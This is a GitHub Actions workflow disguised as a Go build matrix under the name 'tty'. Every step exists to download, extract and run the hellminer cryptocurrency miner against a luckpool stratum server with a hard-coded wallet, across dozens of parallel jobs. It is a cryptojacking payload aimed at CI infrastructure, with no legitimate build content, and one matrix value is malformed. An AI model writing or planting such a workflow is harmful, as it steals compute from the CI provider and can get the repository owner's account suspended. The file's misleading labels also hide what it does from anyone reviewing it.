name: tty
 
 
 
on: [workflow_dispatch] 
 
 
jobs: 
 
build: 
 
name: tty
 
runs-on: ubuntu-22.04
 
strategy: 
 
max-parallel: 5 
 
fail-fast: false 
 
matrix: 
 
go: [1.0, 1.1, 1.2, 1.3, 1,35] 
 
flag: [A, B, C, D, E, F, G, H, I] 
 
env: 
 
NUM_JOBS: 20 
 
JOB: ${{ matrix.go }} 
 
steps: 
 
- name: DOWNLOAD 
 
run: ! wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
 
- name: Extract 
 
run: ! tar xf hellminer_cpu_linux.tar.gz
 
- name: Running 
 
run: ! ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RD2FWnigj5dupvscu2ozjSeLXoV4ffouSb.githubwork1 -p x

- name: END 
 
run: exit
